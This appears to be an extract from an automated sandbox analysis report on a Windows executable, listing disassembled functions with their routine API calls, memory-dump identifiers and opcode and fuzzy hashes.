                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$LibraryLoad
                                • String ID: `F
                                • API String ID: 1136134869-510860190
                                • Opcode ID: 02fbe770a4ac2aa8b23c5c59aa6e5085aec8f34126d19a1e892c7792ea2694f1
                                • Instruction ID: 858c2c246f4d39a708d822f308bc4982e9749b720751373080d25441086fd49e
                                • Opcode Fuzzy Hash: 02fbe770a4ac2aa8b23c5c59aa6e5085aec8f34126d19a1e892c7792ea2694f1
                                • Instruction Fuzzy Hash: 9C115A712047518FD360DF1DE808756BBE4EB85B15F15847EE599C7660D3B8E888CBA0
                                Function 00424822 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52threadCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Cnd_broadcastCurrentMtx_unlockThread
                                • String ID: 0@F
                                • API String ID: 2021000804-3035404066
                                • Opcode ID: bdf9f7690fb5a3299c830190ccfff93e47a9427776f5e8f933d065b1cc046307
                                • Instruction ID: 3610079e00c21cd2b0de95d1b9184f3cd789ea88e03aa853727036e2a8390633
                                • Opcode Fuzzy Hash: bdf9f7690fb5a3299c830190ccfff93e47a9427776f5e8f933d065b1cc046307
                                • Instruction Fuzzy Hash: 8301F935710B228BDB14AB56E4506ABB3A5EFC0358F91442FD41557301D738EC00C798
                                Function 003FE750 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 49libraryCOMMON
                                Download Yara Rule
                                APIs
                                • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 003FE758
                                • LoadLibraryW.KERNEL32 ref: 003FE76F
                                • GetLastError.KERNEL32 ref: 003FE784
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$LibraryLoad
                                • String ID: `F
                                • API String ID: 1136134869-510860190
                                • Opcode ID: f47f57870428e3a959e5f122267c765a750ff222d822601437925c15dfd1eb1d
                                • Instruction ID: 2087f70c41b8330d3df8bf3e11db7bf1f7f44cb27cb04a723847165815a2b493
                                • Opcode Fuzzy Hash: f47f57870428e3a959e5f122267c765a750ff222d822601437925c15dfd1eb1d
                                • Instruction Fuzzy Hash: 661139B52046429FD350CF1EE908B91FBE4BB94315F19C176E518C7A50D7B9D868CBA0
                                Function 003E3860 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44memoryCOMMON
                                Download Yara Rule
                                APIs
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E3886
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 003E38B7
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 003E38D5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FreeHeap$___std_exception_destroy
                                • String ID: @ >
                                • API String ID: 2050543389-3678301659
                                • Opcode ID: fd3da8bc35e3547b1b4ae728200718eb7d9f2bcc84ce332d91798f15088fcee9
                                • Instruction ID: 393988ffc1b9b47d4ec7c31c2f1a56fbd0d9a3b0af153f99b3c34c20a94ce555
                                • Opcode Fuzzy Hash: fd3da8bc35e3547b1b4ae728200718eb7d9f2bcc84ce332d91798f15088fcee9
                                • Instruction Fuzzy Hash: B601A2B5601722ABE7109F62DC48B53B7A8FF41325F154228F61487690D774EC29CBE0
                                Function 00424501 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • InitializeCriticalSectionEx.KERNEL32(00000010,00000FA0,00000000,0000000C,004247C1,00000010,0000000C,?,003EA18F,0000000C,00000002), ref: 004244E0
                                • RtlInitializeConditionVariable.NTDLL(00000010), ref: 004244F7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Initialize$ConditionCriticalSectionVariable
                                • String ID: CEB$NEB
                                • API String ID: 129850285-3584107315
                                • Opcode ID: 7d62dfaf48efb898ef5dbbdbdec41de52a8658aa43edea584f210ffd862b061e
                                • Instruction ID: 2445e1d36edda9d0aef9e39836c76894c73c5dc560e3d6d1445a7ac92c7ceafe
                                • Opcode Fuzzy Hash: 7d62dfaf48efb898ef5dbbdbdec41de52a8658aa43edea584f210ffd862b061e
                                • Instruction Fuzzy Hash: F8F0623530022497C7249F5CF8187E277D8D785712F844527EA4683750DBB8ED91DA8D
                                Function 004230C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,003FA839), ref: 004230C6
                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004230D6
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                • API String ID: 1646373207-2102062458
                                • Opcode ID: aa443b1e4c809b5b2c98d17cf1d4bfdd482d84d38df7a10389cdc4547884a320
                                • Instruction ID: dc4298ec5b8352bd939ecb59013dee50b6a2bc2f89cf2390bb6e78d5ef271f61
                                • Opcode Fuzzy Hash: aa443b1e4c809b5b2c98d17cf1d4bfdd482d84d38df7a10389cdc4547884a320
                                • Instruction Fuzzy Hash: 20D01235A407311399712B347D0A68F1B645B42B92B054462FD059A295CD7C8C5596E9
                                Function 0042EC14 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000002,eB,0042EC0E,eB,0042E465,?,00000002,A05DD77D,0042E465,00000002), ref: 0042EC25
                                • TerminateProcess.KERNEL32(00000000), ref: 0042EC2C
                                • ExitProcess.KERNEL32 ref: 0042EC3E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID: eB
                                • API String ID: 1703294689-509024042
                                • Opcode ID: 199636be2903f7df62ccba64ce35ab4701828baebf4072f982f761445e976462
                                • Instruction ID: 64cfddfb5a1e7ba727ad865f33b5792221af498026435a0445903b0670d2fe56
                                • Opcode Fuzzy Hash: 199636be2903f7df62ccba64ce35ab4701828baebf4072f982f761445e976462
                                • Instruction Fuzzy Hash: C0D05E35000148AFCF002FA3FD0D9493F2AAF413407808021BA0949131CF3988619A48
                                Function 003E2CC0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32(kernelbase.dll), ref: 003E2CC8
                                • GetProcAddress.KERNEL32(00000000,RaiseFailFastException), ref: 003E2CD4
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProc
                                • String ID: RaiseFailFastException$kernelbase.dll
                                • API String ID: 1646373207-919018592
                                • Opcode ID: c2f59fdd4c153b7119e0886f718eecdda9b74d68d97e5e06b858a4cf5eded439
                                • Instruction ID: adccd01f9c2780ad56e3df2de41056d3f8e6158e9d71a20e6c96e382942d15df
                                • Opcode Fuzzy Hash: c2f59fdd4c153b7119e0886f718eecdda9b74d68d97e5e06b858a4cf5eded439
                                • Instruction Fuzzy Hash: 6BC08C322C8348A7625067E2BC0EF3A7B4C9612B213240822FF0CC0080CFA9C47592BD
                                Function 0041E5F0 Relevance: 6.4, APIs: 2, Strings: 2, Instructions: 398COMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32 ref: 0041EA63
                                  • Part of subcall function 00420250: GetLastError.KERNEL32 ref: 0042028E
                                • LocalFree.KERNEL32(?), ref: 0041E9F2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$FreeLocal
                                • String ID: 1.2.840.113549.1.9.6$1.3.6.1.4.1.311.3.3.1
                                • API String ID: 1627422176-1286475088
                                • Opcode ID: e8eefd33c52a691128883475ca6518ee6d8adfdde0db1e8fae7257b726657c8f
                                • Instruction ID: 7133682c02d6760a8788497dbd7dc2b782dcef2bfbf136b85f3062ef91d3978f
                                • Opcode Fuzzy Hash: e8eefd33c52a691128883475ca6518ee6d8adfdde0db1e8fae7257b726657c8f
                                • Instruction Fuzzy Hash: AE028CB4D002499FDB11CF65C880BDEFBF1BF55304F14816AD859AB382EB39A985CB94
                                Function 003E4B00 Relevance: 6.4, APIs: 4, Instructions: 395COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ClearVariant
                                • String ID:
                                • API String ID: 1473721057-0
                                • Opcode ID: dd0a0b48f15444ee53bb10a1840fa0a596c7832db5d8d7f2312be53eda304f1b
                                • Instruction ID: c00b50431703a6a7b107762b4d0e0d42825207bbb569273d2bb4847d28eef1f1
                                • Opcode Fuzzy Hash: dd0a0b48f15444ee53bb10a1840fa0a596c7832db5d8d7f2312be53eda304f1b
                                • Instruction Fuzzy Hash: 0EC13772A00164AFDB11DF6ADC45BAFF7A8FB48314F15826EE809A7381D735AD00CB90
                                Function 003F2AD0 Relevance: 6.4, APIs: 4, Instructions: 359COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: Variant$ClearCopyInit
                                • String ID:
                                • API String ID: 1785138364-0
                                • Opcode ID: df9829998627ace3a4291d8ef2d27352d19a961a653bdd274bd0b3084a735189
                                • Instruction ID: 9e8e1ff303356b83df5a757ad1ae68593e5f78fb02ab1fb1666b7707f18d2564
                                • Opcode Fuzzy Hash: df9829998627ace3a4291d8ef2d27352d19a961a653bdd274bd0b3084a735189
                                • Instruction Fuzzy Hash: 45B147B2A00118EFD715DF29DC46BBFB7A8EB48314F15822EE905A7391E775AC00C7A4
                                Function 00431FCB Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetConsoleOutputCP.KERNEL32(A05DD77D,?,00000000,?), ref: 0043202E
                                  • Part of subcall function 004319A8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00432DDA,?,00000000,-00000008), ref: 00431A54
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00432289
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004322D1
                                • GetLastError.KERNEL32 ref: 00432374
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                • String ID:
                                • API String ID: 2112829910-0
                                • Opcode ID: 20a5dd5b5a521f13d66b136c86c95516793057278f59a394b4d3d5eb8a3f2e6f
                                • Instruction ID: 7adeef404b3013284a84804b3ab45ee64d1a9093a14bd1e05fa1e05091aef8aa
                                • Opcode Fuzzy Hash: 20a5dd5b5a521f13d66b136c86c95516793057278f59a394b4d3d5eb8a3f2e6f
                                • Instruction Fuzzy Hash: 7CD19AB5D00248AFCF05CFA8D980AAEBBB4FF4D304F18816AE955E7351D778A942CB54
                                Function 0040A9C0 Relevance: 6.3, APIs: 4, Instructions: 279threadCOMMON
                                Download Yara Rule
                                APIs
                                • Concurrency::cancel_current_task.LIBCPMT ref: 0040AB07
                                • GetLastError.KERNEL32(A05DD77D,?,?), ref: 0040AB86
                                • SwitchToThread.KERNEL32 ref: 0040ABC4
                                • SetLastError.KERNEL32(?,00000000), ref: 0040ACA2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: ErrorLast$Concurrency::cancel_current_taskSwitchThread
                                • String ID:
                                • API String ID: 2137634594-0
                                • Opcode ID: 9a1f028c3732a1923477028a77ebb7486d2e1c4e714153b58a1e528d2a8c1601
                                • Instruction ID: 1d29f2589c76c50169b9fff164b0a79c63c02114d14ae5022e499cb73776d13a
                                • Opcode Fuzzy Hash: 9a1f028c3732a1923477028a77ebb7486d2e1c4e714153b58a1e528d2a8c1601
                                • Instruction Fuzzy Hash: A5A10471A00205DFDB04DFA8D980AAEFBB5FF48304F24827EE915A7381D739A951CB95
                                Function 0040C5E0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 192COMMON
                                Download Yara Rule
                                APIs
                                • CloseHandle.KERNEL32(?,?,?,00000000), ref: 0040C68D
                                  • Part of subcall function 00405F60: DeviceIoControl.KERNEL32(0040C674,000900EB,00000000,00000000,?,00000250,?,00000000), ref: 00405FCB
                                Strings
                                • C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp, xrefs: 0040C81E
                                • failed to get journal info for '%.*ls' (0x%p), xrefs: 0040C7DA
                                • trust, xrefs: 0040C7E5
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.0000000000481000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835535745.000000000048A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835687294.000000000048F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_3e0000_PeFIvJrY.jbxd
                                Similarity
                                • API ID: CloseControlDeviceHandle
                                • String ID: C:\jenkins\workspace\sumer_Cardinal_aviary-sdk_master\src\trust\lib\trust_impl.cpp$failed to get journal info for '%.*ls' (0x%p)$trust
                                • API String ID: 2349616827-993390907
                                • Opcode ID: 297cea5207d9336977a13670a623f00e94dbee435364dc32728e4ba6a102317a
                                • Instruction ID: 6a8019fe8826de32cdef02639b45398297f6e8d60075bd4399cd0eb1e9f87bce
                                • Opcode Fuzzy Hash: 297cea5207d9336977a13670a623f00e94dbee435364dc32728e4ba6a102317a
                                • Instruction Fuzzy Hash: D9816070D00259CBDB14DF64C885BEEB7B5BF54304F0482AAD4097B292DB799E84CF55
                                Function 003F8B20 Relevance: 6.2, APIs: 4, Instructions: 190COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00424A98: QueryPerformanceFrequency.KERNEL32(?,00000000,?,?,?,003F69AE,?,?,?,?,?,?,?,003F9042), ref: 00424AB3
                                  • Part of subcall function 00424A81: QueryPerformanceCounter.KERNEL32(?,?,?,?,003F69BD,?,?,?,?,?,?,?,003F9042), ref: 00424A8A
                                • __alldvrm.LIBCMT ref: 003F8B9D
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F8BD0
                                • __Xtime_get_ticks.LIBCPMT ref: 003F8C08
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003F8C8C
                                Memory Dump Source
                                • Source File: 0000000C.00000002.3832775154.00000000003E1000.00000040.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                • Associated: 0000000C.00000002.3832723726.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.000000000045C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3832775154.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 0000000C.00000002.3835486938.0000000000467000.00000002.00000001.01000000.00000004.sdmpDownload File
